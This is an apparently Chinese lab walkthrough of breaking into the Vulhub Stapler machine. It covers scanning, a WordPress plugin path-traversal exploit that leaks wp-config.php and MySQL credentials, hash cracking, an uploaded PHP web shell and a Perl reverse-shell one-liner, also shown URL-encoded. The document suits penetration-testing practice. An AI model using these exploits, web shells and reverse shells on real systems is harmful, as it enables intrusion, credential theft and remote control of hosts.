vulhub-Stapler
主机探测
└─# arp-scan -l
端口探测
└─# nmap -p- -A 192.168.200.130
目录扫描
└─# dirsearch -u http://192.168.200.130/
21 ftp 管理端口 (可以匿名访问)
get命令下载文件
查看文件内容
扫描Samba服务器
└─# enum4linux -a 192.168.200.130
通过smbclient访问共享目录
smbclient //192.168.200.130/kathy
通过smbclient访问共享目录
smbclient //192.168.200.130/tmp
访问12380端口
nikto扫描发现网站使用ssl,同时发现几个目录/phpmyadmin/ 、/admin112233/等
└─# nikto -h 192.168.200.130 -p 12380访问https://
访问/phpmyadmin/目录
访问blogblog/目录,发现(CMS)WordPress
使用wpscan扫描
wpscan --url https://192.168.200.130:12380/blogblog/ --disable-tls-checks
发现advanced video模块
searchsploit查一下有没有可以利用的payload
└─# searchsploit advanced video
分析python编写的payload
└─# searchsploit -m exploits/php/webapps/39646.py
└─# vim /usr/share/exploitdb/exploits/php/webapps/39646.py
poc:http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]依据poc,构造一个url
https://192.168.200.130:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../../../../../../../../../etc/passwd返回个url
访问url
下载jpeg文件
wget --no-check-certificate https://192.168.200.130:12380/blogblog/wp-content/uploads/143450359.jpeg
本地查看
https://192.168.200.130:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
下载jpeg文件
wget --no-check-certificate https://192.168.200.130:12380/blogblog/wp-content/uploads/2002494408.jpeg└─# cat 2002494408.jpeg得到mysql账号密码等信息
root/plbkac
登录mysql
mysql -h 192.168.200.130 -u root -p plbkac
使用john工具对user_pass进行解密
└─# john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
└─# john --show password.txt
登录
jhon/incorrect
上传木马文件
GIF89a
<?php
system($_GET['132']);
phpinfo();
?>
访问
└─# weevely https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php test
https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php_.php?132=id
反弹shell生成器
perl -e 'use Socket;$i="192.168.200.130";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php_.php?132=70%65%72%6c%20%2d%65%20%27%75%73%65%20%53%6f%63%6b%65%74%3b%24%69%3d%22%31%39%32%2e%31%36%38%2e%32%30%30%2e%31%33%30%22%3b%24%70%3d%39%39%39%39%3b%73%6f%63%6b%65%74%28%53%2c%50%46%5f%49%4e%45%54%2c%53%4f%43%4b%5f%53%54%52%45%41%4d%2c%67%65%74%70%72%6f%74%6f%62%79%6e%61%6d%65%28%22%74%63%70%22%29%29%3b%69%66%28%63%6f%6e%6e%65%63%74%28%53%2c%73%6f%63%6b%61%64%64%72%5f%69%6e%28%24%70%2c%69%6e%65%74%5f%61%74%6f%6e%28%24%69%29%29%29%29%7b%6f%70%65%6e%28%53%54%44%49%4e%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%4f%55%54%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%45%52%52%2c%22%3e%26%53%22%29%3b%65%78%65%63%28%22%73%68%20%2d%69%22%29%3b%7d%3b%27mysql写入一句话木马
